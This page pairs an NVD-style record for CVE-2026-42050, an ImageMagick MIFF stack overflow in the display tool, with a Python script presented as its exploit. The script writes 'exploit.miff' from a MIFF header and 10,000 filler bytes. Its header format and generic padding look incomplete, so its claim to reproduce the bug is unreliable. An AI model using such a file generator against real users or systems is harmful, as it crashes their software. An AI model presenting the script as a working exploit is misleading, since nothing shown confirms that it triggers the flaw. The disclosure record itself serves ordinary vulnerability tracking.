CVE-2026-42050

import struct def create_malicious_miff(filename): # MIFF header header = b"id=ImageMagick\n" header += b"class=DirectClass\n" header += b"matte=True\n" header += b"columns=100\n" header += b"rows=100\n" header += b"depth=8\n" # Malformed data to trigger overflow during Load/Update # This simulates a tile data structure with unexpected size payload = b"" + b"A" * 10000 with open(filename, 'wb') as f: f.write(header + b"\n") f.write(payload) create_malicious_miff('exploit.miff') print('Malicious MIFF file generated.')

{"cve": {"id": "CVE-2026-42050", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:42.280", "lastModified": "2026-05-11T20:25:42.280", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-21 and 6.9.13-46, a malicious MIFF file could trigger an overflow when a user opens it in the display tool and right-clicks a tile to invoke the Load / Update menu item. This vulnerability is fixed in 7.1.2-21 and 6.9.13-46."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7mxf-ff4f-jj7p", "source": "[email protected]"}]}}